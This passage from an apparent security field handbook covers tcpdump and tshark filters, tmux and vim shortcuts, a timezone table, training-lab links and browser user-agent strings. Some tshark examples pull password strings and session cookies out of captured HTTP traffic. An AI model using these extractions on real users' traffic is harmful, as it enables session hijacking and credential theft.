
We will be looking for the reply given by the SSH server.
OpenSSH usually replies with something like "SSH-2.0-
OpenSSH_3.6.1p2".
The first 4 bytes (SSH-) have an hex value of 0x5353482D.
# tcpdump -i eth1 'tcp[(tcp[12]>>2):4] = 0x5353482D'

If we want to find any connection made to older version of OpenSSH

(version 1, which are insecure and subject to MITM attacks) :

296
The reply from the server would be something like "SSH-1.99.."
# tcpdump -i eth1 '(tcp[(tcp[12]>>2):4] = 0x5353482D) and
(tcp[((tcp[12]>>2)+4):2] = 0x312E)'

Match ICMP messages type 4, are sent in case of congestion on the

network.
# tcpdump -i eth1 'icmp[0] = 4'

REFERENCE:
[Link]
tcpdump/blob/master/tcpdump_advanced_filters.txt
[Link]
eet-tcpdump-A4
[Link]
[Link]
[Link]
[Link]

T T
THREAT INTELLIGENCE
BLUE TEAM MISC N/A

Curated List of Threat Intelligence Sources

[Link]

T T
TIMEZONES
ALL INFORMATIONAL N/A

COUNTRY/REGION TIME ZONE OFFSET

Afghanistan Afghanistan ST UTC+04:30
Alaska Alaskan ST UTC-09:00
Albania: Tirana Central European ST UTC+01:00
Algeria Central European ST UTC+01:00
Almaty, Novosibirsk N. Central Asia ST UTC+06:00
American Samoa Samoa ST UTC-11:00
Andorra Romance ST UTC+01:00
Angola W. Central Africa ST UTC+01:00
Anguilla SA Western ST UTC-04:00
Antarctica GMT ST UTC
Antigua and Barbuda SA Western ST UTC-04:00
Argentina: Buenos Aires Argentina ST UTC-03:00
Armenia Caucasus ST UTC+04:00
Aruba, Caracas SA Western ST UTC-04:00
Atlantic Time (Canada) Atlantic ST UTC-04:00
Australia: Darwin AUS Central ST UTC+09:30

297
Australia: Adelaide Cen. Australia ST UTC+09:30
Australia: Brisbane, Coral
Sea Islands E. Australia ST UTC+10:00
Australia: Canberra,
Melbourne, Sydney AUS Eastern ST UTC+10:00
Australia: Perth, Ashmore &
Cartier Islands W. Australia ST UTC+08:00
Austria: Vienna W. Europe ST UTC+01:00
Azerbaijan Azerbaijan ST UTC+04:00
Azores Azores ST UTC-01:00
Bahamas, The Eastern ST UTC-05:00
Bahrain, Kuwait, Riyadh,
Qatar, Saudi Arabia Arab ST UTC+03:00
Baku, Tbilisi, Yerevan Caucasus ST UTC+04:00
Bangladesh Central Asia ST UTC+06:00
Barbados SA Western ST UTC-04:00
Belarus Further-Eastern ET UTC+03:00
Belgium Brussels Romance ST UTC+01:00
Belize Central America ST UTC-06:00
Benin W. Central Africa ST UTC+01:00
Bermuda SA Western ST UTC-04:00
Bhutan Central Asia ST UTC+06:00
Bolivia: La Paz SA Western ST UTC-04:00
Bosnia and Herzegovina:
Sarajevo Central European ST UTC+01:00
Botswana South Africa ST UTC+02:00
Bouvet Island W. Central Africa ST UTC+01:00
Brazil: Brasilia E. South America ST UTC-03:00
British Indian Ocean
Territory Central Asia ST UTC+06:00
Brunei Singapore ST UTC+08:00
Bulgaria: Sofia FLE ST UTC+02:00
Burkina Faso Greenwich ST UTC
Burundi South Africa ST UTC+02:00
Cabo Verde(Cape Verde)
islands Cabo Verde ST UTC-01:00
Cambodia SE Asia ST UTC+07:00
Cameroon W. Central Africa ST UTC+01:00
Cayman Islands SA Pacific ST UTC-05:00
Central African Republic W. Central Africa ST UTC+01:00
Central Time (US and Canada) Central ST UTC-06:00
Chad W. Central Africa ST UTC+01:00
Channel Islands GMT ST UTC
Chile: Santiago Pacific SA ST UTC-04:00
China: Beijing , Macao SAR,
Hong Kong SAR China ST UTC+08:00
Christmas Island SE Asia ST UTC+07:00
Cocos (Keeling) Islands SE Asia ST UTC+07:00
Colombia: Bogota, Ecuador:
Quito SA Pacific ST UTC-05:00

298
Comoros E. Africa ST UTC+03:00
Congo W. Central Africa ST UTC+01:00
Congo (DRC) W. Central Africa ST UTC+01:00
Cook Islands Hawaiian ST UTC-10:00
Costa Rica Central America ST UTC-06:00
Croatia: Zagreb Central European ST UTC+01:00
Cuba SA Pacific ST UTC-05:00
Cyprus GTB ST UTC+02:00
Czech Republic: Prague Central Europe ST UTC+01:00
Côte d'Ivoire Greenwich ST UTC
Denmark: Copenhagen Romance ST UTC+01:00
Diego Garcia Central Asia ST UTC+06:00
Djibouti E. Africa ST UTC+03:00
Dominica SA Western ST UTC-04:00
Dominican Republic SA Western ST UTC-04:00
Eastern Time (US and Canada) Eastern ST UTC-05:00
Ecuador SA Pacific ST UTC-05:00
Egypt Cairo Egypt ST UTC+02:00
Ekaterinburg Ekaterinburg ST UTC+05:00
El Salvador Central America ST UTC-06:00
Equatorial Guinea W. Central Africa ST UTC+01:00
Eritrea E. Africa ST UTC+03:00
Estonia: Tallinn FLE ST UTC+02:00
Eswatini (formerly Swaziland) South Africa ST UTC+02:00
Ethiopia E. Africa ST UTC+03:00
Falkland Islands (Islas
Malvinas) Atlantic ST UTC-03:00
Faroe Islands GMT ST UTC
Fiji Islands Fiji ST UTC+12:00
Finland: Helsinki FLE ST UTC+02:00
France: Paris Romance ST UTC+01:00
French Guiana SA Eastern ST UTC-03:00
French Polynesia West Pacific ST UTC+10:00
French Southern and Antarctic
Lands Arabian ST UTC+04:00
Gabon W. Central Africa ST UTC+01:00
Gambia, The Greenwich ST UTC
Georgia: Tbilisi Georgian ST UTC+04:00
Germany: Berlin W. Europe ST UTC+01:00
Ghana Greenwich ST UTC
Gibraltar W. Europe ST UTC+01:00
Greece Athens GTB ST UTC+02:00
Greenland Greenland ST UTC-03:00
Grenada SA Western ST UTC-04:00
Guadeloupe SA Western ST UTC-04:00
Guam West Pacific ST UTC+10:00
Guantanamo Bay Eastern ST UTC-05:00
Guatemala Central America ST UTC-06:00
Guernsey GMT ST UTC
Guinea Greenwich ST UTC

299
Guinea-Bissau Greenwich ST UTC
Guyana: Georgetown SA Western ST UTC-04:00
Haiti Eastern ST UTC-05:00
Heard Island and McDonald
Islands Arabian ST UTC+04:00
Honduras Central America ST UTC-06:00
Howland Island Samoa ST UTC-11:00
Hungary: Budapest Central Europe ST UTC+01:00
Iceland Greenwich ST UTC
India India ST UTC+05:30
Indonesia: Jakarta SE Asia ST UTC+07:00
International Date Line West,
Baker Island Dateline ST UTC-12:00
Iran Iran ST UTC+03:30
Iraq Arabic ST UTC+03:00
Ireland: Dublin GMT ST UTC
Isle of Man GMT ST UTC
Israel Israel ST UTC+02:00
Italy: Rome W. Europe ST UTC+01:00
Jamaica SA Pacific ST UTC-05:00
Jan Mayen W. Europe ST UTC+01:00
Japan: Osaka, Sapporo, Tokyo Tokyo ST UTC+09:00
Jarvis Island Samoa ST UTC-11:00
Jersey GMT ST UTC
Johnston Atoll Samoa ST UTC-11:00
Jordan Jordan ST UTC+02:00
Kazakhstan Central Asia ST UTC+06:00
Kenya E. Africa ST UTC+03:00
Kingman Reef Samoa ST UTC-11:00
Kiribati Tonga ST UTC+13:00
Korea Korea ST UTC+09:00
Krasnoyarsk North Asia ST UTC+07:00
Kyrgyzstan Central Asia ST UTC+06:00
Laos SE Asia ST UTC+07:00
Latvia: Riga, Vilnius FLE ST UTC+02:00
Lebanon Middle East ST UTC+02:00
Lesotho South Africa ST UTC+02:00
Liberia Monrovia Greenwich ST UTC
Libya: Tripoli Libya ST UTC+01:00
Liechtenstein W. Europe ST UTC+01:00
Lithuania FLE ST UTC+02:00
Luxembourg W. Europe ST UTC+01:00
Macedonia FYROM W. Europe ST UTC+01:00
Madagascar E. Africa ST UTC+03:00
Malawi South Africa ST UTC+02:00
Malaysia: Kuala Lumpur Singapore ST UTC+08:00
Maldives West Asia ST UTC+05:00
Mali Greenwich ST UTC
Malta W. Europe ST UTC+01:00
Marshall Islands Fiji ST UTC+12:00

300
Martinique SA Western ST UTC-04:00
Mauritania Greenwich ST UTC
Mauritius Mauritius ST UTC+04:00
Mayotte, Nairobi E. Africa ST UTC+03:00
Mexico Tijuana Pacific ST (Mexico) UTC-08:00
Mexico: Chihuahua, Mazatlan,
La Paz Mountain ST (Mexico) UTC-07:00
Mexico: Guadalajara, Mexico
City, Monterrey Central ST (Mexico) UTC-06:00
Micronesia Fiji ST UTC+12:00
Midway Islands Samoa ST UTC-11:00
Moldova FLE ST UTC+02:00
Monaco W. Europe ST UTC+01:00
Mongolia:Ulaanbaatar,
Russia:Irkutsk North Asia East ST UTC+08:00
Montserrat SA Western ST UTC-04:00
Morocco Casablanca Morocco ST UTC
Mountain Time (US and Canada) Mountain ST UTC-07:00
Mozambique South Africa ST UTC+02:00
Myanmar: Yangon Rangoon Myanmar ST UTC+06:30
Namibia Namibia ST UTC+01:00
Nauru Fiji ST UTC+12:00
Nepal: Kathmandu Nepal ST UTC+05:45
Netherlands Antilles SA Western ST UTC-04:00
Netherlands: Amsterdam W. Europe ST UTC+01:00
New Caledonia Central Pacific ST UTC+11:00
New Zealand New Zealand ST UTC+12:00
Newfoundland/Labrador
Newfoundland and Labrador ST UTC-03:30
Nicaragua Central America ST UTC-06:00
Niger W. Central Africa ST UTC+01:00
Nigeria W. Central Africa ST UTC+01:00
Niue Samoa ST UTC-11:00
Norfolk Island Central Pacific ST UTC+11:00
North Korea Tokyo ST UTC+08:30
Northern Mariana Islands West Pacific ST UTC+10:00
Norway W. Europe ST UTC+01:00
Oman Arabian ST UTC+04:00
Pacific Time (US and Canada) Pacific ST UTC-08:00
Pakistan Pakistan ST UTC+05:00
Pakistan: Islamabad, Karachi West Asia ST UTC+05:00
Palau Tokyo ST UTC+09:00
Palestinian Authority GTB ST UTC+02:00
Palmyra Atoll Samoa ST UTC-11:00
Panama SA Pacific ST UTC-05:00
Papua New Guinea: Port
Moresby West Pacific ST UTC+10:00
Paraguay SA Pacific ST UTC-05:00
Peru: Lima SA Pacific ST UTC-05:00

301
Philippines, China:
Chongqing, China: Ürümqi China ST UTC+08:00
Pitcairn Islands Pacific ST UTC-08:00
Poland: Warsaw, Skopje Central European ST UTC+01:00
Portugal: Lisbon GMT ST UTC
Puerto Rico SA Western ST UTC-04:00
Romania GTB ST UTC+02:00
Romania: Bucharest E. Europe ST UTC+02:00
Rota Island West Pacific ST UTC+10:00
Russia: Moscow, St.
Petersburg, Volgograd Russian ST UTC+03:00
Rwanda South Africa ST UTC+02:00
Réunion Arabian ST UTC+04:00
Saint Helena, Ascension,
Tristan da Cunha GMT ST UTC
Saipan West Pacific ST UTC+10:00
Samoa Samoa ST UTC-11:00
San Marino W. Europe ST UTC+01:00
Saskatchewan Canada Central ST UTC-06:00
Senegal Greenwich ST UTC
Serbia: Belgrade Central Europe ST UTC+01:00
Seychelles Arabian ST UTC+04:00
Sierra Leone Greenwich ST UTC
Singapore Singapore ST UTC+08:00
Slovakia: Bratislava Central Europe ST UTC+01:00
Slovenia: Ljubljana Central Europe ST UTC+01:00
Solomon Islands Central Pacific ST UTC+11:00
Somalia E. Africa ST UTC+03:00
South Africa: Pretoria South Africa ST UTC+02:00
South Georgia & South
Sandwich Islands Mid-Atlantic ST UTC-02:00
Spain Madrid Romance ST UTC+01:00
Sri Lanka: Sri
Jayawardenepura Sri Lanka ST UTC+05:30
St. Helena Greenwich ST UTC
St. Kitts and Nevis SA Western ST UTC-04:00
St. Lucia SA Western ST UTC-04:00
St. Pierre and Miquelon SA Eastern ST UTC-03:00
St. Vincent and the
Grenadines SA Western ST UTC-04:00
Sudan E. Africa ST UTC+03:00
Suriname SA Eastern ST UTC-03:00
Svalbard W. Europe ST UTC+01:00
Sweden: Stockholm W. Europe ST UTC+01:00
Switzerland: Bern W. Europe ST UTC+01:00
Syria South Africa ST UTC+02:00
São Tomé and Príncipe Greenwich ST UTC
Taiwan: Taipei Taipei ST UTC+08:00
Tanzania E. Africa ST UTC+03:00
Tasmania: Hobart Tasmania ST UTC+10:00

302
 Thailand: Bangkok SE Asia ST UTC+07:00
Timor-Leste Tokyo ST UTC+09:00
Tinian Island West Pacific ST UTC+10:00
Togo Greenwich ST UTC
Tokelau Hawaiian ST UTC-10:00
Tonga: Nuku'alofa Tonga ST UTC+13:00
Trinidad and Tobago SA Western ST UTC-04:00
Tristan da Cunha Greenwich ST UTC
Tunisia W. Europe ST UTC+01:00
Turkey: Istanbul Turkey ST UTC+02:00
Turkmenistan, Tajikistan West Asia ST UTC+05:00
Turks and Caicos Islands SA Pacific ST UTC-05:00
Tuvalu Fiji ST UTC+12:00
US Arizona, Clipperton Island US Mountain ST UTC-07:00
US Indiana (East) U.S. Eastern ST UTC-05:00
US and Canada Pacific ST UTC-08:00
US and Canada Mountain ST UTC-07:00
US and Canada Central ST UTC-06:00
US and Canada Eastern ST UTC-05:00
Uganda E. Africa ST UTC+03:00
Ukraine: Kiev FLE ST UTC+02:00
United Arab Emirates Arabian ST UTC+04:00
United Kingdom: London,
Edinburgh GMT ST UTC
Uruguay SA Eastern ST UTC-03:00
Uzbekistan: Tashkent West Asia ST UTC+05:00
Vanuatu: Port Vila, Russia:
Magadan Central Pacific ST UTC+11:00
Vatican City W. Europe ST UTC+01:00
Venezuela Venezuela ST UTC-04:30
Vietnam: Hanoi SE Asia ST UTC+07:00
Virgin Islands SA Western ST UTC-04:00
Virgin Islands, British SA Western ST UTC-04:00
Vladivostok Vladivostok ST UTC+10:00
Wake Island Fiji ST UTC+12:00
Wallis and Futuna Fiji ST UTC+12:00
Yakutsk Yakutsk ST UTC+09:00
Yemen E. Africa ST UTC+03:00
Zambia South Africa ST UTC+02:00
Zimbabwe: Harare South Africa ST UTC+02:00

T T
TMUX
ALL ADMINISTRATION LINUX/MacOS
tmux is a terminal multiplexer that lets you switch easily between
several programs in one terminal, detach them, and reattach them to
a different terminal.

303
SESSIONS
tmux Start a tmux session
tmux new -s example Start a new named session
tmux kill-ses -t example Kill a named session
tmux kill-ses -a Kill all sessions except current
tmux kill-ses -a -t Kill all except the named session
example
tmux ls List all sessions
tmux a Attach to last session
tmux a -t example Attach to named session
tmux new -s example -n Start new session with name and
window1 window name
NAVIGATION
Ctrl + b $ Rename a session
Ctrl + b d Detach from session
Ctrl + b s List all sessions
Ctrl + b ( Move to previous session
Ctrl + b ) Move to next session
Ctrl + b c Create window
Ctrl + b , Rename current window
Ctrl + b & Close current window
Ctrl + b p Previous window
Ctrl + b n Next window
Ctrl + b q Show pane numbers
Ctrl + b 0 Switch/select window by number [0-9]
Ctrl + b ; Toggle last active pane
Ctrl + b % Split pane vertically

Ctrl + b " Split pane horizontally

Ctrl + b { Move the current pane left
Ctrl + b } Move the current pane right
Ctrl + b Spacebar Toggle between pane layouts
Ctrl + b o Switch to next pane
Ctrl + b z Toggle pane zoom
Ctrl + b x Close current pane
ADVANCED
tmux info Show every session, window, pane,
etc...
Ctrl + b ? Show shortcuts
Ctrl + b : setw Synchronize & send command to all
synchronize-panes panes
Ctrl + b : swap-window -s Reorder window, swap window number
2 -t 1 2(src) and 1(dst)
show-buffer
Ctrl + b : set -g OPTION Set OPTION for all sessions
Ctrl + b : setw -g OPTION Set OPTION for all windows

304
T T
TRAINING_Blue Team
BLUE TEAM MISC ALL

Detection Lab
This lab has been designed with defenders in mind. Its primary
purpose is to allow the user to quickly build a Windows domain that
comes pre-loaded with security tooling and some best practices when
it comes to system logging configurations.
[Link]

Modern Windows Attacks and Defense Lab

This is the lab configuration for the Modern Windows Attacks and
Defense class that Sean Metcalf (@pyrotek3) and I teach.
[Link]

Invoke-UserSimulator
Simulates common user behavior on local and remote Windows hosts.
[Link]

Invoke-ADLabDeployer
Automated deployment of Windows and Active Directory test lab
networks. Useful for red and blue teams.
[Link]

Sheepl
Creating realistic user behavior for supporting tradecraft
development within lab environments.
[Link]

MemLabs - Memory Forensics CTF

MemLabs is an educational, introductory set of CTF-styled
challenges which is aimed to encourage students, security
researchers and also CTF players to get started with the field of
Memory Forensics.
[Link]

Security Certification Progression Chart

Reddit -> u/SinecureLife
[Link]
tification_progression_chart_2020/
[Link]

T T
TRAINING_OSINT
OSINT MISC ALL

305
Bellingcat Workshops
[Link]

T T
TRAINING_Red Team
RED TEAM MISC ALL

IPPSEC - Hackthebox, CTF, Training Walkthroughs

[Link]

[Link]
Hack The Box is an online platform allowing you to test your
penetration testing skills and exchange ideas and methodologies
with thousands of people in the security field.
[Link]

awesome-cyber-skills
A curated list of hacking environments where you can train your
cyber skills legally and safely
[Link]

VULNHUB
To provide materials that allows anyone to gain practical 'hands-
on' experience in digital security, computer software & network
administration.
[Link]

CTF Awesome Lists

[Link]
[Link]

Bug Bounties Lists

[Link]
[Link]

Security Certification Progression Chart

Reddit -> u/SinecureLife
[Link]
tification_progression_chart_2020/
[Link]

T T
TSHARK
RED/BLUE NETWORK TRAFFIC WINDOWS/LINUX/MacOS

306
COMMAND DESCRIPTION
tshark -D Available Interfaces
tshark -h Help
tshark -i # (# is interface number)
tshark -i 'name' ('name' is interface Capture on an
name) Interface
Write capture to a
tshark -i # -w {path and file name} file
tshark -i # -f "filter text using BPF
syntax" Capture using a filter
tshark -R “[Link] == [Link]″ -r Generic Capture for an
/tmp/[Link] IP Address
Ethernet address
[Link] == [Link] [Link]
Ethernet type
[Link] == 0×0806 0×0806 (ARP)
[Link] == [Link] Ethernet broadcast
not arp No ARP
ip IPv4 only
ip6 IPv6 only
IPv4 address is not
!([Link] == [Link]) [Link]
ipx IPX only
tcp TCP only
udp UDP only
Include display
filters when examining
-Y <display filter> a capture file
UDP port isn't 53 (not
DNS), don't use != for
!([Link] == 53) this!
TCP or UDP port is 80
[Link] == 80 || [Link] == 80 (HTTP)
http HTTP Only
not arp and not ([Link] == 53) No ARP and no DNS
not ([Link] == 80) and not ([Link] Non-HTTP and non-SMTP
== 25) and [Link] == [Link] to/from [Link]
tshark -o
“tcp.desegment_tcp_streams:TRUE” -i eth0
-R “[Link]” -T fields -e Display http response
[Link] codes
Display Source IP and
tshark -i eth0 -nn -e [Link] -e [Link] MAC Address. (coma
-Tfields -E separator=, -R ip sep)
tshark -i eth0 -nn -e [Link] -e [Link] Display Target IP and
-Tfields -E separator=, -R ip Mac Address (coma sep)
tshark -i eth0 -nn -e [Link] -e [Link] -
Tfields -E separator=, -R ip Source and Target IPv4
tshark -i eth0 -nn -e [Link] -e [Link]
-Tfields -E separator=, -R ip6 Source and Target IPv6

307
tshark -i eth0 -nn -e [Link] -e
[Link] -E separator=”;” -T fields Source IP and DNS
port 53 Query
Display only the
tshark -o [Link]:’”Source”, Source and the
“%s”,”Destination”, “%d”‘ -Ttext Destination IP
tshark -r [Link] -qz
io,stat,1,0,sum([Link] Various Statistics
ion)”[Link]==[Link]″ > [Link] example from a capture
tshark -r [Link] -qz
io,stat,120,”[Link]==[Link] &&
tcp”,”COUNT([Link])
[Link]==[Link] && Various Statistics
[Link]” example from a capture
tshark -r [Link] -q -z
io,stat,30,”COUNT([Link] Various Statistics
ssion) [Link]” example from a capture
tshark -r [Link] -q -z Various Statistics
ip_hosts,tree example from a capture
Various Statistics
tshark -r [Link] -q -z conv,tcp example from a capture
tshark -r [Link] -q -z Various Statistics
ptype,tree example from a capture
tshark -r [Link] -R [Link]
-T fields -e [Link] -e
[Link] |sed -e ‘s/?.*$//’ |
sed -e ‘s#^(.*)t(.*)$#[Link] | sort
| uniq -c | sort -rn | head Display Top 10 URLs
Creating a “;”
tshark -nn -r [Link] -T fields separated file with
-E separator=’;’ -e [Link] -e “source IP” “destIP”
[Link] -e [Link] -e [Link] and “dest port” with
‘([Link] == 1 and [Link] SYN initiated
== 0)’ connections
HTTP traffic from a
tshark -Y ‘http’ -r HTTP_traffic.pcap PCAP file
Show the IP packets
tshark -r HTTP_traffic.pcap -Y sent from IP address
"[Link]==[Link] && [Link] to IP
[Link]==[Link]" address [Link]?
Only print packets
tshark -r HTTP_traffic.pcap -Y containing GET
"[Link]==GET" requests
tshark -r HTTP_traffic.pcap -Y
"[Link]==GET" -Tfields -e Print only source IP
[Link] -e [Link] -e and URL for all GET
[Link].full_uri request packets
How many HTTP packets
tshark -r HTTP_traffic.pcap -Y "http contain the "password"
contains password” string

308
 tshark -r HTTP_traffic.pcap -Y Which IP address was
"[Link]==GET && sent GET requests for
[Link]==[Link]" -Tfields -e New York Times
[Link] ([Link])
What is the session ID
tshark -r HTTP_traffic.pcap -Y "ip being used by
contains [Link] && [Link] for
[Link]==[Link]" -Tfields -e Amazon India store
[Link] -e [Link] ([Link])
What type of OS the
machine on IP address
[Link] is
tshark -r HTTP_traffic.pcap -Y using (i.e.
"[Link]==[Link] && http" - Windows/Linux/MacOS/So
Tfields -e http.user_agent laris/Unix/BSD)
tshark -Y ‘ssl’ -r HTTPS_traffic.pcap Only show SSL traffic
Only print the source
tshark -r HTTPS_traffic.pcap -Y IP and destination IP
"[Link]" -Tfields -e [Link] -e for all SSL handshake
[Link] packets
tshark -r HTTPS_traffic.pcap -Y List issuer name for
"[Link]" -Tfields -e all SSL certificates
[Link] exchanged
tshark -r HTTPS_traffic.pcap -Y "ssl && Print the IP addresses
[Link]==1" -Tfields -e of all servers
[Link] accessed over SSL
IP addresses
associated with Ask
tshark -r HTTPS_traffic.pcap -Y "ip Example servers
contains askexample" ([Link])
tshark -r HTTPS_traffic.pcap -Y
"[Link]==[Link] || IP address of the user
[Link]==[Link] || who interacted with
[Link]==[Link] || with Ask Ubuntu
[Link]==[Link]" -Tfields -e servers
[Link] ([Link])
DNS servers were used
tshark -r HTTPS_traffic.pcap -Y "dns && by the clients for
[Link]==0" -Tfields -e domain name
[Link] resolutions
What are the IP
tshark -r HTTPS_traffic.pcap -Y "ip addresses of the
contains avast" -Tfields -e [Link] machines running Avast

REFERENCE:
[Link]
usage-examples
[Link]

309
U
U U
USER AGENTS
ALL INFORMATIONAL ALL
Top 50 User Agents sorted by OS & Software version.

OS SOFTWARE USER AGENT

Mozilla/5.0 (Linux; Android 6.0.1;
RedMi Note 5 Build/RB3N5C; wv)
AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0
Chrome/68.0.3440.91 Mobile
Android Chrome 68 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS
11_4_1 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like
Gecko) Version/11.0 Mobile/15E148
iOS Safari 11 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS
12_1 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like
Gecko) Version/12.0 Mobile/15E148
iOS Safari 12 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS
12_4_1 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like
Gecko) Version/12.1.2 Mobile/15E148
iOS Safari 12.1 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS
12_3_1 like Mac OS X)
iOS Safari 12.1 AppleWebKit/605.1.15 (KHTML, like

310
 Gecko) Version/12.1.1 Mobile/15E148
Safari/604.1
Mozilla/5.0 (iPad; CPU OS 12_2 like
Mac OS X) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.1
iOS Safari 12.1 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Macintosh; Intel Mac
OS X 10_14_5) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.1.1
macOS Safari 12.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac
Webkit based OS X 10_12_6) AppleWebKit/603.3.8
macOS browser (KHTML, like Gecko)
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 57 Chrome/57.0.2987.133 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 58 Chrome/58.0.3029.110 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64;
x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/60.0.3112.113
Windows Chrome 60 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 61 Chrome/61.0.3163.100 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64;
x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/63.0.3239.132
Windows Chrome 63 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 64 Chrome/64.0.3282.186 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 65 Chrome/65.0.3325.181 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 67 Chrome/67.0.3396.99 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64;
x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/67.0.3396.99
Windows Chrome 67 Safari/537.36

311
 Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 68 Chrome/68.0.3440.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64;
x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/69.0.3497.100
Windows Chrome 69 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 70 Chrome/70.0.3538.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 70 Chrome/70.0.3538.110 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 70 Chrome/70.0.3538.77 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 72 Chrome/72.0.3626.121 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 74 Chrome/74.0.3729.131 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64;
x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/79.0.3945.88
Windows Chrome 79 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 79 Chrome/79.0.3945.130 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Windows Chrome 79 Chrome/79.0.3945.117 Safari/537.36
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Chrome/52.0.2743.116 Safari/537.36
Windows Edge 40 Edge/15.15063
Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Chrome/58.0.3029.110 Safari/537.36
Windows Edge 41 Edge/16.16299

312
 Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko)
Chrome/70.0.3538.102 Safari/537.36
Windows Edge 44 Edge/18.18362
Mozilla/5.0 (Windows NT 5.1;
rv:33.0) Gecko/20100101
Windows Firefox 33 Firefox/33.0
Mozilla/5.0 (Windows NT 5.1;
rv:36.0) Gecko/20100101
Windows Firefox 36 Firefox/36.0
Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:43.0) Gecko/20100101
Windows Firefox 43 Firefox/43.0
Mozilla/5.0 (Windows NT 10.0;
WOW64; rv:50.0) Gecko/20100101
Windows Firefox 50 Firefox/50.0
Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:50.0) Gecko/20100101
Windows Firefox 50 Firefox/50.0
Mozilla/5.0 (Windows NT 10.0;
WOW64; rv:52.0) Gecko/20100101
Windows Firefox 52 Firefox/52.0
Mozilla/5.0 (Windows NT 10.0;
Win64; x64; rv:61.0) Gecko/20100101
Windows Firefox 61 Firefox/61.0
Mozilla/5.0 (Windows NT 10.0;
Win64; x64; rv:66.0) Gecko/20100101
Windows Firefox 66 Firefox/66.0
Mozilla/5.0 (Windows NT 10.0;
Win64; x64; rv:67.0) Gecko/20100101
Windows Firefox 67 Firefox/67.0
Mozilla/5.0 (compatible; MSIE 10.0;
Windows IE 10 Windows NT 6.2)
Mozilla/5.0 (compatible; MSIE 10.0;
Windows IE 10 Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0;
Windows IE 10 Windows NT 6.1; Trident/6.0)
Mozilla/5.0 (Windows NT 6.3; WOW64;
Windows IE 11 Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.0;
Windows IE 6 Windows NT 5.0; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 7.0;
Windows IE 7 Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 6.0; SLCC1; .NET CLR
2.0.50727; Media Center PC
Windows IE 7 5.0; .NET CLR 3.0.04506)
Mozilla/4.0 (compatible; MSIE 7.0;
Windows IE 7 Windows NT 5.1)

313
 Mozilla/5.0 (compatible; MSIE 9.0;
Windows IE 9 Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; Win64; x64;
Windows IE 9 Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0;
Windows IE 9 Windows NT 6.1; Trident/5.0)

V
V V
VIM
ALL ADMINISTRATION WINDOWS/LINUX/MacOS
Vim is highly customizable and extensible text editor.

GLOBAL
:help keyword open help for keyword
:o file open file
:saveas file save file as
:close close current pane
MOVE CURSOR
h move cursor left
j move cursor down
k move cursor up
l move cursor right
H move to top of screen
M move to middle of screen
L move to bottom of screen
w jump forwards to the start of a word
W jump forwards to the start of a word

314
e jump forwards to the end of a word
E jump forwards to the end of a word
